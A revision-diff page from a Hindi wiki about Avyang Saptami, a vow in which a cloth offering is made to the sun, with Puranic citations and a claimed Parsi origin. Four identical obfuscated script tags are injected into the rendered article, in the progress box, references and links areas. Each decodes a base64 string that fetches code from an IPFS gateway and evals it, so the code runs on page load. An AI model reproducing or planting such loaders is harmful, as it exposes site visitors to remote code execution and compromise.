Difference between revisions of "अव्यंग सप्तमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 2 users not shown)
Line 3: Line 3:
 
*इस व्रत में [[सूर्य देव|सूर्य]] को अव्यंग दिया जाता है।  
 
*इस व्रत में [[सूर्य देव|सूर्य]] को अव्यंग दिया जाता है।  
 
*ऐसी मान्यता है कि अव्यंग एक छिछला (पुटाकार) वस्त्रखण्ड, जो कपास की रुई के सूत से बना होता है, जो [[सर्प]] के फण के समान होता है, और 122 अंगुल लम्बा (उत्तम) या 120 अंगुल लम्बा (मध्यम) या 108 अंगुल लम्बा होता है।  
 
*ऐसी मान्यता है कि अव्यंग एक छिछला (पुटाकार) वस्त्रखण्ड, जो कपास की रुई के सूत से बना होता है, जो [[सर्प]] के फण के समान होता है, और 122 अंगुल लम्बा (उत्तम) या 120 अंगुल लम्बा (मध्यम) या 108 अंगुल लम्बा होता है।  
*यह आधुनिक [[पारसी धर्म|पारसियों]] के द्वारा पहनी जाने वाली कुरती के समान होता है। भविष्योत्तर पुराण<ref>(ब्राह्मणपर्व के 3, 1-8); भविष्य॰ (ब्राह्मणपर्व 142|1-29)</ref> में अव्यंगोत्पत्ति की कथा है।  
+
*यह आधुनिक [[पारसी धर्म|पारसियों]] के द्वारा पहनी जाने वाली कुरती के समान होता है। भविष्योत्तर पुराण<ref>ब्राह्मणपर्व के 3, 1-8); भविष्य॰ (ब्राह्मणपर्व 142|1-29</ref> में अव्यंगोत्पत्ति की कथा है।  
 
*18वें [[श्लोक]] में 'शारसनः' शब्द आया है जो 'सारसेन' (एक [[मुसलमान|मुस्लिम]] जाति) का स्मरण दिलाता है।  
 
*18वें [[श्लोक]] में 'शारसनः' शब्द आया है जो 'सारसेन' (एक [[मुसलमान|मुस्लिम]] जाति) का स्मरण दिलाता है।  
*ऐसी मान्यता है कि यह जेन्द अवेस्ता (पारसियों के धार्मिक ग्रन्थ) के 'ऐव्यंघन' (मेखला या करधनी) का रूपान्तर है।  
+
*ऐसी मान्यता है कि यह [[अवेस्ता|जेन्द अवेस्ता]] (पारसियों के धार्मिक ग्रन्थ) के 'ऐव्यंघन' (मेखला या करधनी) का रूपान्तर है।  
 
*ऐसी मान्यता है कि यह विधि पारसियों से उधार ली हुई है।  
 
*ऐसी मान्यता है कि यह विधि पारसियों से उधार ली हुई है।  
*बृहत्संहिता<ref>(बृहत्संहिता 59|19)</ref> में आया है कि सविता के पुरोहितों को मग या शाकद्वीपीय [[ब्राह्मण]] होना चाहिए।
+
*बृहत्संहिता<ref>बृहत्संहिता 59|19</ref> में आया है कि सविता के पुरोहितों को मग या शाकद्वीपीय [[ब्राह्मण]] होना चाहिए।
 +
 
 +
 
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
  
{{प्रचार}}
 
{{लेख प्रगति
 
|आधार=
 
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
{{संदर्भ ग्रंथ}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
{{पर्व और त्योहार}}
+
{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{व्रत और उत्सव}}
+
[[Category:व्रत और उत्सव]][[Category:पर्व_और_त्योहार]][[Category:संस्कृति कोश]]
 
 
[[Category:व्रत और उत्सव]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:संस्कृति कोश]]
 
 
__INDEX__
 
__INDEX__

Latest revision as of 12:14, 9 May 2014

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • shravan shukl paksh ki saptami tithi ko avyangasaptami prativarsh sampadit ki jane vali hai.
  • is vrat mean soory ko avyang diya jata hai.
  • aisi manyata hai ki avyang ek chhichhala (putakar) vastrakhand, jo kapas ki ruee ke soot se bana hota hai, jo sarp ke phan ke saman hota hai, aur 122 aangul lamba (uttam) ya 120 aangul lamba (madhyam) ya 108 aangul lamba hota hai.
  • yah adhunik parasiyoan ke dvara pahani jane vali kurati ke saman hota hai. bhavishyottar puran[1] mean avyangotpatti ki katha hai.
  • 18vean shlok mean 'sharasanah' shabd aya hai jo 'sarasen' (ek muslim jati) ka smaran dilata hai.
  • aisi manyata hai ki yah jend avesta (parasiyoan ke dharmik granth) ke 'aivyanghan' (mekhala ya karadhani) ka roopantar hai.
  • aisi manyata hai ki yah vidhi parasiyoan se udhar li huee hai.
  • brihatsanhita[2] mean aya hai ki savita ke purohitoan ko mag ya shakadvipiy brahman hona chahie.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. brahmanaparv ke 3, 1-8); bhavishy॰ (brahmanaparv 142|1-29
  2. brihatsanhita 59|19

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>